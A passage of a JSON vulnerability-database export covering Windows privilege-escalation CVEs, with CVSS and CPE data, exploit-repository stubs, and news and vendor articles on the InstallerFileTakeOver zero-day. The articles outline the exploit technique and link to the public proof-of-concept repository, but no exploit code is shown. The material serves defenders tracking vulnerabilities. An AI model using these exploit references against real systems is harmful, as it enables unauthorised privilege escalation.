{"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T01:19:00", "type": "cve", "title": "CVE-2021-41379", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-12T20:17:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2021-41379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41379", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:30:33", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "cve", "title": "CVE-2021-34484", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-23T20:25:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-34484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}], "prion": [{"lastseen": "2023-08-16T02:11:09", "description": "Windows Mobile Device Management Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-25T23:15:00", "type": "prion", "title": "CVE-2021-24084", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2022-06-28T14:11:00", "id": "PRION:CVE-2021-24084", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-24084", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-08-16T07:18:22", "description": "Windows Installer Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, 
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T01:19:00", "type": "prion", "title": "CVE-2021-41379", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-41379", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-41379", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T05:58:16", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "prion", "title": "CVE-2021-34484", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-23T20:25:00", "id": "PRION:CVE-2021-34484", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2023-09-28T15:02:03", "description": "<h1 align=\"center\">WindowsMDM-LPE-0Day</h1>\n<i><h3 align=\"center...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-28T09:48:36", "type": "githubexploit", "title": "Exploit for Link Following in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2023-09-28T11:33:35", "id": "291894F9-38D4-5877-8B8F-EF46C6D23B82", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-10T14:59:52", "description": "# WindowsMDMLPE\n\nDemo : ht...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", 
"availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-11-27T00:37:07", "type": "githubexploit", "title": "Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2022-02-10T13:34:38", "id": "3AA8003E-06D3-57B2-BB7E-43616295A4B7", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-20T21:38:55", "description": "# shakeitoff\r\n\r\nA smaller, minimized, and cleaner version of [In...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-02T19:15:59", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43883"], "modified": "2022-03-20T15:46:42", "id": "DF9C9272-7F4D-5362-A6BF-18A60A5E907D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows Installer contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Installer Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2021-41379", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.6, 
"vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows User Profile Service contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2022-03-31T00:00:00", "id": "CISA-KEV-CVE-2021-34484", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEixE9g-lXbfi04ffXtXrVqyoSpB_rf6Xn-3UD4qDKdyKWD2TaCbvUtbUMmIbDUiMA3xnT8OdE411V7_fx1D1kuieTuYdHoVsC1SoBl69hpqZkwOnyA6NrQdijQkPLyKGgpd3Umvvds1Cw76DTRtk-jYcUcMS7l6HHe68rkzx4pI16PGnMHYxy04yi1U>)\n\nAttackers are actively making efforts to exploit a new variant of a recently disclosed privilege escalation vulnerability to potentially execute arbitrary code on 
fully-patched systems, once again demonstrating how adversaries move quickly to weaponize a publicly available exploit.\n\nCisco Talos [disclosed](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>) that it \"detected malware samples in the wild that are attempting to take advantage of this vulnerability.\"\n\nTracked as [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) and discovered by security researcher Abdelhamid Naceri, the elevation of privilege flaw affecting the Windows Installer software component was originally resolved as part of Microsoft's [Patch Tuesday updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>) for November 2021.\n\nHowever, in what's a case of an insufficient patch, Naceri found that it was not only possible to bypass the fix implemented by Microsoft but also [achieve](<https://twitter.com/wdormann/status/1462607586272976901>) local privilege escalation via a newly discovered zero-day bug.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgAfxkfmkohSpEjMhQZH5LNqwQ1pen7O9L6K2QMRFBjQt_93j5vdXaqk25vj1EgZFyrSPMKMbPL_H_4wzzfmo8AD1z11O900nY3rqYMjhBmVpXrXb-PnYDbp3RrkfeTpctYgyD4wSlXli4azzDxKLTfqLL2Qqs-uPTjf7HbPXJTwIniEqWf1DChqwZW>)\n\nThe proof-of-concept (PoC) exploit, dubbed \"[InstallerFileTakeOver](<https://github.com/klinix5/InstallerFileTakeOver>),\" works by overwriting the discretionary access control list ([DACL](<https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists>)) for Microsoft Edge Elevation Service to replace any executable file on the system with an MSI installer file, allowing an attacker to run code with SYSTEM privileges.\n\nAn attacker with admin privileges could then abuse the access to gain full control over the compromised system, including the ability to download additional software, and modify, delete, or exfiltrate sensitive information stored in the machine.\n\n\"Can confirm this works, 
local priv esc. Tested on Windows 10 20H2 and Windows 11. The prior patch MS issued didn't fix the issue properly,\" [tweeted](<https://twitter.com/GossiTheDog/status/1462721449425264645>) security researcher Kevin Beaumont, corroborating the findings.\n\nNaceri noted that the latest variant of CVE-2021-41379 is \"more powerful than the original one,\" and that the best course of action would be to wait for Microsoft to release a security patch for the problem \"due to the complexity of this vulnerability.\"\n\n\"We are aware of the disclosure and will do what is necessary to keep our customers safe and protected,\" a Microsoft spokesperson told The Hacker News via email. \"An attacker using the methods described must already have access and the ability to run code on a target victim's machine.\"\n\n**_Update:_** 0patch has issued a free micropatch to remediate the \"InstallerFileTakeOver\" zero-day flaw in Windows Installer component that could be abused by a local unprivileged user to overwrite an existing system executable and then arbitrarily change its contents to gain SYSTEM permissions.\n\n\"It doesn't take a lot of imagination to see that taking over an executable file that is being used by a privileged process can get one's code executed with such process' privileges,\" 0patch's Mitja Kolsek [said](<https://blog.0patch.com/2021/12/free-micropatches-for.html>) in a write-up published Thursday.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-25T08:10:00", "type": "thn", "title": "Warning \u2014 Hackers Exploiting New Windows Installer Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-12-03T03:42:18", "id": "THN:48C46A645A455217EADCA99ECBFB18B8", "href": "https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-11-26T18:36:46", "description": "Sometimes the ways in which malicious code gets in the hands of cybercriminals is frustrating for those in the industry, and incomprehensible to those on the outside.\n\nA quick summary of the events in the history of this exploit:\n\n * A researcher found a flaw in Windows Installer that would allow an attacker to delete targeted files on 
an affected system with elevated privileges.\n * Microsoft patched the vulnerability in November\u2019s Patch Tuesday update.\n * The researcher found a way to circumvent the patch and this time decided not to engage in responsible disclosure because he got frustrated with Microsoft\u2019s bug bounty program.\n * The researcher\u2019s PoC is being tested in the wild and cybercriminals could be preparing the first real attacks exploiting this vulnerability.\n\nLet's have a look at what is going on and how it came to this.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in question was listed as [CVE-2021-41379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41379>) and is a local Windows Installer Elevation of Privilege (EoP) vulnerability. If successfully exploited, the bypass could give attackers SYSTEM privileges on up-to-date devices running the latest Windows releases, including Windows 10, Windows 11, and Windows Server 2022.\n\nBy exploiting this zero-day, threat actors that already have limited access to compromised systems can elevate their privileges and use these privileges to spread laterally within a target network.\n\n### The patch\n\nMicrosoft patched the vulnerability in the [November Patch Tuesday updates](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/patch-now-microsoft-plugs-actively-exploited-zero-days-and-other-updates/>). But according to the researcher, the bug was not fixed correctly. He discovered a new variant during the analysis of the CVE-2021-41379 patch.\n\nWith the new variant, an attacker will be able to run programs with a higher privilege than they are entitled to. 
To be clear, an attacker using the new variant must already have access and the ability to run code on a target victim's machine, but now they can run the code with SYSTEM privileges thanks to the exploit.\n\n### The frustration\n\nThe researcher appears to have been so disappointed in Microsoft after he responsibly disclosed the vulnerability by means of the [Trend Micro zero-day initiative](<https://www.zerodayinitiative.com>), that he decided to skip that path altogether when he found the new method to bypass the patch. The researcher published a new version of the proof of concept (PoC) exploit, which is even more powerful than the original exploit.\n\nApparently the main reason for his frustration was the reward level.\n\n\u201cMicrosoft\u2019s rewards have been very bad since April 2020; the community wouldn\u2019t make these kinds of decisions if Microsoft took its rewards seriously.\u201d\n\n### In the wild\n\nSeveral security vendors have noticed malware samples in the wild that are attempting to take advantage of this vulnerability. A quick search on VirusTotal showed dozens of different files that tried to do this. This may be some threat actors testing the exploit code to turn it into something they can use in their attacks, along with some researchers trying out different ways to use and stop the exploit. It is worrying nonetheless to see once again how quickly attackers are able to weaponize publicly available exploit code.\n\n### Mitigation\n\nThe researcher recommends users wait for Microsoft to release a security patch, due to the complexity of this vulnerability, although he doesn\u2019t seem confident that Microsoft will get it right this time.\n\n"Any attempt to patch the binary directly will break windows installer. So you better wait and see how Microsoft will screw the patch again."\n\nMicrosoft says it is working on it. 
In the meantime, Malwarebytes Premium and business users are protected, because our programs detect the files using this vulnerability as Exploit.Agent.\n\nMalwarebytes detects and stops the exploit\n\nStay safe, everyone!\n\nThe post [Windows Installer vulnerability becomes actively exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/windows-installer-vulnerability-becomes-actively-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-24T14:21:50", "type": "malwarebytes", "title": "Windows Installer vulnerability becomes actively exploited zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-24T14:21:50", "id": "MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/windows-installer-vulnerability-becomes-actively-exploited-zero-day/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-14T11:27:50", "description": "On Friday March 
